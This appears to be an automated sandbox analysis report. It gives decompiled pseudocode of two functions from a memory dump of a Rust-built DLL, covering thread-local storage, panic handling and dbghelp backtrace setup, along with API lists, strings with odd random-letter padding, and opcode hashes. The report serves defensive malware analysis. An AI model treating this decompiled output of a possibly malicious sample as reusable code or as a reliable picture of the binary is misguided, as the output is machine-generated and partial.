						_t205 =  *0x6f28a044; // 0x0
						if(_t205 == 0) {
							_t285 = 0x6f28a044;
							_t205 = E6F242B10(_t268, 0x6f28a044, _t337, _t340);
						}
						_t197 = TlsGetValue(_t205);
						if(_t197 <= 1) {
							L43:
							_t206 =  *0x6f28a044; // 0x0
							__eflags = _t206;
							if(_t206 == 0) {
								_t285 = 0x6f28a044;
								_t206 = E6F242B10(_t268, 0x6f28a044, _t337, _t340);
							}
							_t197 = TlsGetValue(_t206);
							__eflags = _t197;
							if(_t197 == 0) {
								_t207 =  *0x6f28adc8;
								__eflags = _t207;
								if(_t207 != 0) {
									L67:
									_t208 = HeapAlloc(_t207, 0, 0x10);
									__eflags = _t208;
									if(__eflags != 0) {
										 *_t208 = 0;
										 *(_t208 + 0xc) = 0x6f28a044;
										_t340 = _t208;
										_t209 =  *0x6f28a044; // 0x0
										__eflags = _t209;
										if(_t209 == 0) {
											_v36 = _t340;
											_t209 = E6F242B10(_t268, 0x6f28a044, _t337, _t340);
											_t340 = _v36;
										}
										_t197 = TlsSetValue(_t209, _t340);
										goto L76;
									}
									L68:
									_t251 = E6F256C30(_t268, 0x10, 4, _t337, _t340, __eflags);
									asm("ud2");
									L69:
									_t332 = _v60;
									_t303 = _v64;
									__eflags = _t332 - 4;
									if(_t332 == 4) {
										__eflags =  *_t251 - 0x6c6c7566;
										if( *_t251 != 0x6c6c7566) {
											L84:
											_t340 = 2;
											_t271 = 0;
											__eflags = 0;
											L85:
											__eflags = _t303;
											if(_t303 != 0) {
												HeapFree( *0x6f28adc8, 0, _t251);
											}
											L87:
											__eflags = _t271 - 5;
											_t316 = _a8;
											_t273 =  !=  ? _t340 : 1;
											_t280 =  !=  ? _t271 & 0x000000ff : 4;
											_t144 =  !=  ? _t340 : 1;
											_t268 =  *0x6f28adb0;
											 *0x6f28adb0 =  !=  ? _t340 : 1;
											L20:
											_v148 = _t316;
											_v128 = _t280;
											_t61 = _t337 + 0xc; // 0x6f243440
											_t199 =  *_t61;
											_v40 = _t199;
											_t200 =  *_t199(_v36);
											_t348 = _t348 + 4;
											_t318 = _t316 ^ 0x7ef2a91e | _t200 ^ 0xecc7bcf4;
											__eflags = _t318;
											if(__eflags != 0) {
												_t202 = _v40(_v36);
												_t348 = _t348 + 4;
												__eflags = _t318 ^ 0xe43a67d8 | _t202 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L63;
												}
												_t254 = _v36;
												_t281 =  *_t254;
												_t204 = _t254[2];
												goto L22;
											}
											_t255 = _v36;
											_t281 =  *_t255;
											_t204 = _t255[1];
											goto L22;
										}
										_t271 = 1;
										_t340 = 3;
										goto L85;
									}
									__eflags = _t332 - 1;
									if(_t332 != 1) {
										goto L84;
									}
									__eflags =  *_t251 - 0x30;
									if( *_t251 != 0x30) {
										goto L84;
									}
									_t271 = 4;
									_t340 = 1;
									goto L85;
								}
								_t207 = GetProcessHeap();
								__eflags = _t207;
								if(__eflags == 0) {
									goto L68;
								}
								 *0x6f28adc8 = _t207;
								goto L67;
							} else {
								_t340 = _t197;
								__eflags = _t197 - 1;
								if(_t197 != 1) {
									L76:
									_t282 =  *(_t340 + 8);
									__eflags =  *_t340;
									_t138 = _t340 + 4; // 0x4
									_t337 = _t138;
									 *_t340 = 1;
									 *(_t340 + 4) = 0;
									 *(_t340 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t282;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t197 = E6F23C800(_t282);
											}
										}
									}
									goto L27;
								}
								_v84 = 0;
								_v36 = 0;
								_t213 = 0;
								__eflags = 0;
								goto L48;
							}
						} else {
							_t337 = _t197;
							if( *_t197 != 1) {
								goto L43;
							}
							_t337 = _t337 + 4;
							L27:
							if( *_t337 != 0) {
								E6F256EE0(_t268, "already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl", 0x10, __eflags,  &_v68, 0x6f27d050, 0x6f27d720);
								_t348 = _t348 + 0xc;
								goto L62;
							}
							 *_t337 = 0xffffffff;
							_t340 =  *(_t337 + 4);
							if(_t340 == 0) {
								_v36 = _t337;
								_v20 = 8;
								_t250 = E6F23C690(_t268, _t337, _t340);
								_t337 = _v36;
								_t340 = _t250;
								_t197 =  *(_t337 + 4);
								_t359 = _t197;
								if(_t359 != 0) {
									asm("lock dec dword [eax]");
									if(_t359 == 0) {
										_t285 =  *(_t337 + 4);
										_t197 = E6F23C800(_t285);
									}
								}
								 *(_t337 + 4) = _t340;
							}
							asm("lock inc dword [esi]");
							if(_t359 <= 0) {
								L17:
								asm("ud2");
								asm("ud2");
								goto L18;
							} else {
								 *_t337 =  *_t337 + 1;
								_v84 = _t340;
								_v36 = _t340;
								if(_t340 != 0) {
									_t212 =  *(_t340 + 0x10);
									__eflags = _t212;
									_t285 =  ==  ? _t212 : _t340 + 0x10;
									if(__eflags != 0) {
										L104:
										_t213 =  *_t285;
										_t285 =  *((intOrPtr*)(_t285 + 4)) - 1;
										L105:
										_v20 = 3;
										L48:
										_v124 = 0x6f27d8fc;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t323 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t215 =  !=  ? _t285 : 9;
										_v80 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t324 =  &_v124;
										_v76 =  !=  ? _t285 : 9;
										_v68 =  &_v80;
										_v64 = 0x6f23de50;
										_v60 =  &_v100;
										_v56 = 0x6f23de50;
										_v52 =  &_v148;
										_v48 = E6F23DE70;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6F23D2A0( &_v92, _t213) == 3) {
											_v20 = 7;
											_v40 = _t324;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t348 = _t348 + 4;
											_t343 = _v40;
											_t300 =  *((intOrPtr*)(_t343 + 4));
											if( *((intOrPtr*)(_t300 + 4)) != 0) {
												_t248 =  *_t343;
												if( *((intOrPtr*)(_t300 + 8)) >= 9) {
													_t248 =  *(_t248 - 4);
												}
												HeapFree( *0x6f28adc8, 0, _t248);
											}
											HeapFree( *0x6f28adc8, 0, _t343);
										}
										_t269 = _v128;
										_t222 =  <  ? (_t269 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t222 == 0) {
											__imp__AcquireSRWLockExclusive(0x6f28adac);
											_v68 = 0x6f27d2c0;
											_v64 = 1;
											_v152 = 0x6f28adac;
											_v41 = _t269;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6F23DEE0;
											_v52 =  &_v124;
											_v48 = 1;
											_t225 = E6F23D2A0( &_v92, __eflags);
											_t341 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6f28adac);
											__eflags = _t225 - 3;
											if(__eflags != 0) {
												goto L95;
											}
											_v20 = 5;
											_v40 = _t341;
											 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))( *_t341);
											_t348 = _t348 + 4;
											goto L90;
										} else {
											if(_t222 == 1) {
												L95:
												_t372 = _v36;
												if(_t372 != 0) {
													asm("lock dec dword [eax]");
													if(_t372 == 0) {
														E6F23C800(_v84);
													}
												}
												_t342 = _v140;
												_t338 = _v136;
												_t373 = _v72;
												if(_t373 != 0) {
													asm("lock dec dword [eax]");
													if(_t373 == 0) {
														E6F23DC20(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6f28adbc);
												_t374 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6f27da8c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6f27cd60;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t229 = E6F23D2A0( &_v80, _t374);
													_v120 =  &_v68;
													_v124 = _t229;
													E6F23D460( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t285 = _t338;
												E6F23D440(_t285, _t342);
												asm("ud2");
												goto L104;
											}
											 *0x6f28a040 = 0;
											_t368 =  *0x6f28a040;
											if( *0x6f28a040 == 0) {
												goto L95;
											}
											_t330 =  &_v68;
											_v68 = 0x6f27d96c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6f27cd60;
											_v48 = 0;
											_v20 = 3;
											if(E6F23D2A0( &_v92, _t368) != 3) {
												goto L95;
											}
											_v40 = _t330;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t330 + 4))))( *_t330);
											_t348 = _t348 + 4;
											L90:
											_t296 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t296 + 4)) != 0) {
												_t238 =  *_v40;
												if( *((intOrPtr*)(_t296 + 8)) >= 9) {
													_t238 =  *(_t238 - 4);
												}
												HeapFree( *0x6f28adc8, 0, _t238);
											}
											HeapFree( *0x6f28adc8, 0, _v40);
											goto L95;
										}
									}
									_t213 = 0;
									goto L105;
								}
								_t213 = 0;
								goto L48;
							}
						}
					}
				}
			}

































































































                          0x6f23c897
                          0x6f23c89a
                          0x6f23c89e
                          0x6f23c8a5
                          0x6f23c8a6
                          0x6f23c8a8
                          0x6f23c8ad
                          0x6f23c8b0
                          0x6f23c8b2
                          0x6f23c8b3
                          0x6f23c8b4
                          0x6f23c8b5
                          0x6f23c8b6
                          0x6f23c8b7
                          0x6f23c8b8
                          0x6f23c8b9
                          0x6f23c8ba
                          0x6f23c8bb
                          0x6f23c8bc
                          0x6f23c8bd
                          0x6f23c8be
                          0x6f23c8bf
                          0x6f23c8c6
                          0x6f23c8cc
                          0x6f23c8cf
                          0x6f23c8d6
                          0x6f23c8dd
                          0x6f23c8e2
                          0x6f23c8e7
                          0x6f23c8f0
                          0x6f23c8f3
                          0x6f23c8f9
                          0x6f23c901
                          0x6f23c906
                          0x6f23c908
                          0x6f23c922
                          0x6f23c927
                          0x6f23c92a
                          0x6f23c92a
                          0x6f23c92e
                          0x6f23c931
                          0x6f23c934
                          0x6f23c936
                          0x6f23c9aa
                          0x6f23c9ad
                          0x6f23ca0a
                          0x6f23ca11
                          0x6f23ca1b
                          0x6f23ca22
                          0x6f23ca29
                          0x6f23ca2d
                          0x6f23ca34
                          0x6f23ca3b
                          0x6f23ca41
                          0x6f23ca44
                          0x6f23ca47
                          0x6f23ca4d
                          0x6f23ca54
                          0x6f23ca57
                          0x6f23ca5e
                          0x6f23ca63
                          0x6f23ca65
                          0x6f23ca6c
                          0x6f23ca74
                          0x6f23ca77
                          0x6f23ca79
                          0x6f23ca7c
                          0x6f23ca7c
                          0x6f23ca7f
                          0x6f23ca82
                          0x6f23ca86
                          0x6f23ca9c
                          0x6f23ca9c
                          0x6f23caaa
                          0x6f23caaa
                          0x00000000
                          0x6f23ca65
                          0x6f23c9b2
                          0x6f23c9b5
                          0x6f23c9bc
                          0x6f23c9c3
                          0x6f23c9ca
                          0x6f23c9d1
                          0x6f23c9d5
                          0x6f23c9dc
                          0x6f23c9e3
                          0x6f23c9e8
                          0x6f23c9ea
                          0x00000000
                          0x6f23c9f0
                          0x6f23c9f5
                          0x6f23c9fd
                          0x6f23ca00
                          0x6f23ca02
                          0x00000000
                          0x6f23ca02
                          0x6f23c93d
                          0x6f23c93d
                          0x6f23c945
                          0x6f23c94b
                          0x6f23c955
                          0x6f23c95c
                          0x6f23c963
                          0x6f23c969
                          0x6f23c96c
                          0x6f23c96f
                          0x6f23c972
                          0x6f23c975
                          0x6f23c97a
                          0x6f23c97d
                          0x6f23c97f
                          0x6f23cab3
                          0x6f23cab3
                          0x6f23cab6
                          0x6f23cab8
                          0x6f23cb8b
                          0x6f23cb90
                          0x6f23cb93
                          0x6f23cb96
                          0x6f23cd97
                          0x00000000
                          0x6f23cd97
                          0x6f23cb9c
                          0x6f23cb9f
                          0x6f23cd90
                          0x00000000
                          0x6f23cd90
                          0x6f23cba5
                          0x6f23cba7
                          0x00000000
                          0x00000000
                          0x6f23cbb0
                          0x6f23cbb5
                          0x6f23cbb8
                          0x6f23cbbb
                          0x6f23cbbd
                          0x00000000
                          0x00000000
                          0x6f23cbc3
                          0x00000000
                          0x6f23cbc3
                          0x6f23cabe
                          0x00000000
                          0x6f23c985
                          0x6f23c99d
                          0x6f23c9a2
                          0x6f23cdbe
                          0x6f23cdbe
                          0x6f23cdc0
                          0x6f23cdc0
                          0x6f23cdc5
                          0x6f23caf3
                          0x6f23caf3
                          0x6f23caf6
                          0x6f23caf9
                          0x6f23cb00
                          0x6f23cb02
                          0x6f23cb07
                          0x6f23cb07
                          0x6f23cb0d
                          0x6f23cb16
                          0x6f23cbf3
                          0x6f23cbf3
                          0x6f23cbf8
                          0x6f23cbfa
                          0x6f23cbfc
                          0x6f23cc01
                          0x6f23cc01
                          0x6f23cc07
                          0x6f23cc0d
                          0x6f23cc0f
                          0x6f23cdcf
                          0x6f23cdd4
                          0x6f23cdd6
                          0x6f23cde6
                          0x6f23cdeb
                          0x6f23cdf0
                          0x6f23cdf2
                          0x6f23ce32
                          0x6f23ce38
                          0x6f23ce3f
                          0x6f23ce41
                          0x6f23ce46
                          0x6f23ce48
                          0x6f23ce4f
                          0x6f23ce52
                          0x6f23ce57
                          0x6f23ce57
                          0x6f23ce5c
                          0x00000000
                          0x6f23ce5c
                          0x6f23cdf4
                          0x6f23cdfe
                          0x6f23ce03
                          0x6f23ce05
                          0x6f23ce05
                          0x6f23ce08
                          0x6f23ce0b
                          0x6f23ce0e
                          0x6f23ceb8
                          0x6f23cebe
                          0x6f23cec9
                          0x6f23cec9
                          0x6f23cece
                          0x6f23cece
                          0x6f23ced0
                          0x6f23ced0
                          0x6f23ced2
                          0x6f23cedd
                          0x6f23cedd
                          0x6f23cee2
                          0x6f23cee2
                          0x6f23ceed
                          0x6f23cef5
                          0x6f23cef8
                          0x6f23cefb
                          0x6f23cefb
                          0x6f23cefb
                          0x6f23cac1
                          0x6f23cac1
                          0x6f23cac7
                          0x6f23caca
                          0x6f23caca
                          0x6f23cad0
                          0x6f23cad3
                          0x6f23cad5
                          0x6f23cae3
                          0x6f23cae3
                          0x6f23cae5
                          0x6f23cbcd
                          0x6f23cbd0
                          0x6f23cbde
                          0x6f23cbe0
                          0x00000000
                          0x00000000
                          0x6f23cbe6
                          0x6f23cbe9
                          0x6f23cbeb
                          0x00000000
                          0x6f23cbeb
                          0x6f23caeb
                          0x6f23caee
                          0x6f23caf0
                          0x00000000
                          0x6f23caf0
                          0x6f23cec0
                          0x6f23cec2
                          0x00000000
                          0x6f23cec2
                          0x6f23ce14
                          0x6f23ce17
                          0x00000000
                          0x00000000
                          0x6f23ce1d
                          0x6f23ce20
                          0x00000000
                          0x00000000
                          0x6f23ce26
                          0x6f23ce28
                          0x00000000
                          0x6f23ce28
                          0x6f23cdd8
                          0x6f23cddd
                          0x6f23cddf
                          0x00000000
                          0x00000000
                          0x6f23cde1
                          0x00000000
                          0x6f23cc15
                          0x6f23cc15
                          0x6f23cc17
                          0x6f23cc1a
                          0x6f23ce62
                          0x6f23ce62
                          0x6f23ce65
                          0x6f23ce68
                          0x6f23ce68
                          0x6f23ce6b
                          0x6f23ce71
                          0x6f23ce78
                          0x6f23ce7f
                          0x6f23ce85
                          0x6f23ce87
                          0x6f23ce8d
                          0x6f23ce90
                          0x6f23ce96
                          0x6f23ce96
                          0x6f23ce90
                          0x6f23ce87
                          0x00000000
                          0x6f23ce7f
                          0x6f23cc20
                          0x6f23cc27
                          0x6f23cc2e
                          0x6f23cc2e
                          0x00000000
                          0x6f23cc2e
                          0x6f23cb1c
                          0x6f23cb1f
                          0x6f23cb21
                          0x00000000
                          0x00000000
                          0x6f23cb27
                          0x6f23cb2a
                          0x6f23cb2d
                          0x6f23cdb6
                          0x6f23cdbb
                          0x00000000
                          0x6f23cdbb
                          0x6f23cb33
                          0x6f23cb39
                          0x6f23cb3e
                          0x6f23cb40
                          0x6f23cb43
                          0x6f23cb4a
                          0x6f23cb4f
                          0x6f23cb52
                          0x6f23cb54
                          0x6f23cb57
                          0x6f23cb59
                          0x6f23cb5b
                          0x6f23cb5e
                          0x6f23cb60
                          0x6f23cb63
                          0x6f23cb63
                          0x6f23cb5e
                          0x6f23cb68
                          0x6f23cb68
                          0x6f23cb6b
                          0x6f23cb6e
                          0x6f23caaf
                          0x6f23caaf
                          0x6f23cab1
                          0x00000000
                          0x6f23cb74
                          0x6f23cb74
                          0x6f23cb78
                          0x6f23cb7b
                          0x6f23cb7e
                          0x6f23cea0
                          0x6f23cea6
                          0x6f23cea8
                          0x6f23ceab
                          0x6f23d062
                          0x6f23d062
                          0x6f23d067
                          0x6f23d068
                          0x6f23d068
                          0x6f23cc30
                          0x6f23cc37
                          0x6f23cc3e
                          0x6f23cc45
                          0x6f23cc4c
                          0x6f23cc50
                          0x6f23cc57
                          0x6f23cc5e
                          0x6f23cc65
                          0x6f23cc6d
                          0x6f23cc70
                          0x6f23cc76
                          0x6f23cc79
                          0x6f23cc7f
                          0x6f23cc85
                          0x6f23cc8c
                          0x6f23cc95
                          0x6f23cc9c
                          0x6f23cca2
                          0x6f23cca9
                          0x6f23ccac
                          0x6f23ccba
                          0x6f23ccc1
                          0x6f23ccc9
                          0x6f23cccc
                          0x6f23ccce
                          0x6f23ccd1
                          0x6f23ccd4
                          0x6f23ccdb
                          0x6f23ccdd
                          0x6f23cce3
                          0x6f23cce5
                          0x6f23cce5
                          0x6f23ccf1
                          0x6f23ccf1
                          0x6f23ccff
                          0x6f23ccff
                          0x6f23cd04
                          0x6f23cd15
                          0x6f23cd1a
                          0x6f23cf0b
                          0x6f23cf1a
                          0x6f23cf21
                          0x6f23cf28
                          0x6f23cf32
                          0x6f23cf35
                          0x6f23cf3c
                          0x6f23cf43
                          0x6f23cf49
                          0x6f23cf50
                          0x6f23cf53
                          0x6f23cf5a
                          0x6f23cf5f
                          0x6f23cf68
                          0x6f23cf6e
                          0x6f23cf71
                          0x00000000
                          0x00000000
                          0x6f23cf78
                          0x6f23cf80
                          0x6f23cf83
                          0x6f23cf85
                          0x00000000
                          0x6f23cd20
                          0x6f23cd23
                          0x6f23cfc0
                          0x6f23cfc3
                          0x6f23cfc5
                          0x6f23cfc7
                          0x6f23cfca
                          0x6f23cfcf
                          0x6f23cfcf
                          0x6f23cfca
                          0x6f23cfd7
                          0x6f23cfdd
                          0x6f23cfe3
                          0x6f23cfe5
                          0x6f23cfe7
                          0x6f23cfea
                          0x6f23cfef
                          0x6f23cfef
                          0x6f23cfea
                          0x6f23cff9
                          0x6f23cfff
                          0x6f23d003
                          0x6f23d00a
                          0x6f23d012
                          0x6f23d019
                          0x6f23d020
                          0x6f23d027
                          0x6f23d02e
                          0x6f23d032
                          0x6f23d039
                          0x6f23d040
                          0x6f23d048
                          0x6f23d04b
                          0x6f23d04e
                          0x6f23d053
                          0x6f23d055
                          0x6f23d055
                          0x6f23d057
                          0x6f23d05b
                          0x6f23d060
                          0x00000000
                          0x6f23d060
                          0x6f23cd2b
                          0x6f23cd31
                          0x6f23cd33
                          0x00000000
                          0x00000000
                          0x6f23cd3c
                          0x6f23cd3f
                          0x6f23cd46
                          0x6f23cd4d
                          0x6f23cd54
                          0x6f23cd5b
                          0x6f23cd62
                          0x6f23cd70
                          0x00000000
                          0x00000000
                          0x6f23cd7b
                          0x6f23cd7e
                          0x6f23cd86
                          0x6f23cd88
                          0x6f23cf88
                          0x6f23cf8b
                          0x6f23cf92
                          0x6f23cf9b
                          0x6f23cf9d
                          0x6f23cf9f
                          0x6f23cf9f
                          0x6f23cfab
                          0x6f23cfab
                          0x6f23cfbb
                          0x00000000
                          0x6f23cfbb
                          0x6f23cd1a
                          0x6f23ceb1
                          0x00000000
                          0x6f23ceb1
                          0x6f23cb84
                          0x00000000
                          0x6f23cb84
                          0x6f23cb6e
                          0x6f23cb16
                          0x6f23c97f

                          APIs
                            • Part of subcall function 6F23C8C0: AcquireSRWLockShared.KERNEL32(6F28ADBC), ref: 6F23C945
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6F23CA9C
                          • HeapFree.KERNEL32(00000000,?), ref: 6F23CAAA
                          • TlsGetValue.KERNEL32(00000000), ref: 6F23CB0D
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6F23CCF1
                          • HeapFree.KERNEL32(00000000,?), ref: 6F23CCFF
                          Strings
                          • Y3$o, xrefs: 6F23C8C5
                          • cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf, xrefs: 6F23C90D, 6F23C988
                          • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6F23CDC0
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeHeap$AcquireLockSharedValue
                          • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $Y3$o$cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf
                          • API String ID: 942675266-3254041949
                          • Opcode ID: d1d13b44cbcc0a4f0091ce1d45e95740c1d36f736ad2e3dc93f8cec9e13ba2a4
                          • Instruction ID: fb5ee25effc77a8fa5984d4594e745d0100bf0d37e1a2510227d807cb74e57bd
                          • Opcode Fuzzy Hash: d1d13b44cbcc0a4f0091ce1d45e95740c1d36f736ad2e3dc93f8cec9e13ba2a4
                          • Instruction Fuzzy Hash: C90243F1E0022E9BDB14CFA4C884B9EBBF2FF45715F10851AE415AB280DB75A916CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23E690, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 135libraryloadersynchronizationCOMMON
                          Download Yara Rule
                          C-Code - Quality: 52%
                          			E6F23E690(void* __ebx, void* __edi, void* __esi, char _a8) {
				int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebp;
				void* _t15;
				struct HINSTANCE__* _t20;
				signed int _t21;
				void* _t23;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				void* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t39;
				signed int _t50;
				_Unknown_base(*)()* _t52;
				void* _t59;

				_t48 = __edi;
				_push(__edi);
				_v32 = _t59 - 0x14;
				_v20 = 0xffffffff;
				_v24 = E6F243BA0;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t35 =  *0x6f28adc4; // 0x0
				if(_t35 == 0) {
					_t15 = CreateMutexA(0, 0, "Local\\RustBacktraceMutex");
					__eflags = _t15;
					if(_t15 == 0) {
						_t54 = 1;
						goto L19;
					} else {
						_t35 = _t15;
						__eflags = 0;
						asm("lock cmpxchg [0x6f28adc4], ebx");
						if(0 != 0) {
							CloseHandle(_t35);
							_t35 = 0;
						}
						goto L1;
					}
				} else {
					L1:
					WaitForSingleObjectEx(_t35, 0xffffffff, 0);
					_t20 =  *0x6f28add0; // 0x0
					if(_t20 != 0) {
						L3:
						_t54 = 0;
						if( *0x6f28ae04 != 0) {
							goto L19;
						} else {
							_t38 =  *0x6f28add4; // 0x0
							if(_t38 != 0) {
								L7:
								_t21 =  *_t38();
								_t39 =  *0x6f28add8; // 0x0
								_t50 = _t21;
								if(_t39 != 0) {
									L10:
									 *_t39(_t50 | 0x00000004);
									_t52 =  *0x6f28addc; // 0x0
									if(_t52 != 0) {
										L13:
										_t23 = GetCurrentProcess();
										 *_t52(_t23, 0, 1);
										 *0x6f28ae04 = 1;
										goto L19;
									} else {
										_t25 = GetProcAddress( *0x6f28add0, "SymInitializeW");
										if(_t25 == 0) {
											_v36 = _t35;
											_v20 = 0;
											E6F256E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t52, _t54, __eflags, 0x6f27dcac);
											goto L23;
										} else {
											_t52 = _t25;
											 *0x6f28addc = _t25;
											goto L13;
										}
									}
								} else {
									_t28 = GetProcAddress( *0x6f28add0, "SymSetOptions");
									if(_t28 == 0) {
										_v36 = _t35;
										_v20 = 0;
										E6F256E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t50, _t54, __eflags, 0x6f27dc9c);
										goto L23;
									} else {
										_t39 = _t28;
										 *0x6f28add8 = _t28;
										goto L10;
									}
								}
							} else {
								_t30 = GetProcAddress(_t20, "SymGetOptions");
								if(_t30 == 0) {
									_v36 = _t35;
									_v20 = 0;
									E6F256E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t48, 0, __eflags, 0x6f27dc8c);
									L23:
									asm("ud2");
									__eflags =  &_a8;
									return E6F23E880(_v36);
								} else {
									_t38 = _t30;
									 *0x6f28add4 = _t30;
									goto L7;
								}
							}
						}
					} else {
						_t20 = LoadLibraryA("dbghelp.dll");
						 *0x6f28add0 = _t20;
						if(_t20 == 0) {
							ReleaseMutex(_t35);
							_t54 = 1;
							L19:
							 *[fs:0x0] = _v28;
							return _t54;
						} else {
							goto L3;
						}
					}
				}
			}






















                          0x6f23e690
                          0x6f23e694
                          0x6f23e699
                          0x6f23e69c
                          0x6f23e6a3
                          0x6f23e6b4
                          0x6f23e6b7
                          0x6f23e6bd
                          0x6f23e6c5
                          0x6f23e7a5
                          0x6f23e7aa
                          0x6f23e7ac
                          0x6f23e7d0
                          0x00000000
                          0x6f23e7ae
                          0x6f23e7ae
                          0x6f23e7b0
                          0x6f23e7b2
                          0x6f23e7ba
                          0x6f23e7c3
                          0x6f23e7c9
                          0x6f23e7c9
                          0x00000000
                          0x6f23e7ba
                          0x6f23e6cb
                          0x6f23e6cb
                          0x6f23e6d0
                          0x6f23e6d5
                          0x6f23e6dc
                          0x6f23e6f5
                          0x6f23e6f5
                          0x6f23e6fe
                          0x00000000
                          0x6f23e704
                          0x6f23e704
                          0x6f23e70c
                          0x6f23e729
                          0x6f23e729
                          0x6f23e72b
                          0x6f23e731
                          0x6f23e735
                          0x6f23e757
                          0x6f23e75b
                          0x6f23e75d
                          0x6f23e765
                          0x6f23e787
                          0x6f23e787
                          0x6f23e791
                          0x6f23e793
                          0x00000000
                          0x6f23e767
                          0x6f23e772
                          0x6f23e77a
                          0x6f23e83d
                          0x6f23e840
                          0x6f23e856
                          0x00000000
                          0x6f23e780
                          0x6f23e780
                          0x6f23e782
                          0x00000000
                          0x6f23e782
                          0x6f23e77a
                          0x6f23e737
                          0x6f23e742
                          0x6f23e74a
                          0x6f23e81a
                          0x6f23e81d
                          0x6f23e833
                          0x00000000
                          0x6f23e750
                          0x6f23e750
                          0x6f23e752
                          0x00000000
                          0x6f23e752
                          0x6f23e74a
                          0x6f23e70e
                          0x6f23e714
                          0x6f23e71c
                          0x6f23e7f7
                          0x6f23e7fa
                          0x6f23e810
                          0x6f23e85e
                          0x6f23e85e
                          0x6f23e864
                          0x6f23e873
                          0x6f23e722
                          0x6f23e722
                          0x6f23e724
                          0x00000000
                          0x6f23e724
                          0x6f23e71c
                          0x6f23e70c
                          0x6f23e6de
                          0x6f23e6e3
                          0x6f23e6ea
                          0x6f23e6ef
                          0x6f23e7d8
                          0x6f23e7dd
                          0x6f23e7e2
                          0x6f23e7e7
                          0x6f23e7f6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23e6ef
                          0x6f23e6dc

                          APIs
                          • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6F23E6D0
                          • LoadLibraryA.KERNEL32(dbghelp.dll,00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6F23E6E3
                          • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6F23E714
                          • GetProcAddress.KERNEL32(SymSetOptions), ref: 6F23E742
                          • GetProcAddress.KERNEL32(SymInitializeW), ref: 6F23E772
                          • GetCurrentProcess.KERNEL32 ref: 6F23E787
                          • CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6F23E7A5
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6F23E7C3
                            • Part of subcall function 6F23E880: ReleaseMutex.KERNEL32(?,6F23E5F8), ref: 6F23E881
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
